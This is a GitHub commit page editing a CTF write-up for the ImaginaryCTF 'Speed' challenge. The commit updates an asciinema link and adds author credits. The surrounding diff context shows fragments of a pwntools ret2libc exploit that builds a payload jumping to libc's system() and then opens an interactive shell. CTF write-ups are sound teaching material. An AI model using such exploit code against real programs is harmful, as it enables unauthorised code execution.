Skip to content

Commit 67123be

Browse files
authored
Update Speed.md
1 parent 180b64e commit 67123be

File tree

1 file changed

+6
-1
lines changed

1 file changed

+6
-1
lines changed

CTFs/ImaginaryCTF/Speed.md

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -258,7 +258,7 @@ payload += p64(libc + 0x0449c0) # system()
258258
## Launching the exploit
259259
Finall version of the exploit is:
260260

261-
[![asciicast](https://asciinema.org/a/HGDVWN49PCOvR23c3LpSevxhK.svg)](https://asciinema.org/a/HGDVWN49PCOvR23c3LpSevxhK)
261+
[![asciicast](https://asciinema.org/a/430559.svg)](https://asciinema.org/a/430559)
262262

263263
Exploit code:
264264
```py
@@ -338,3 +338,8 @@ payload += p64(libc + 0x0449c0) # system()
338338
server.sendline(payload)
339339
server.interactive()
340340
```
341+
342+
## Credits:
343+
Writeup by Filip "Ret2Me" Poplewski
344+
Solved by Filip "Ret2Me" Poplewski
345+
WaletSec 2021

0 commit comments

Comments
 (0)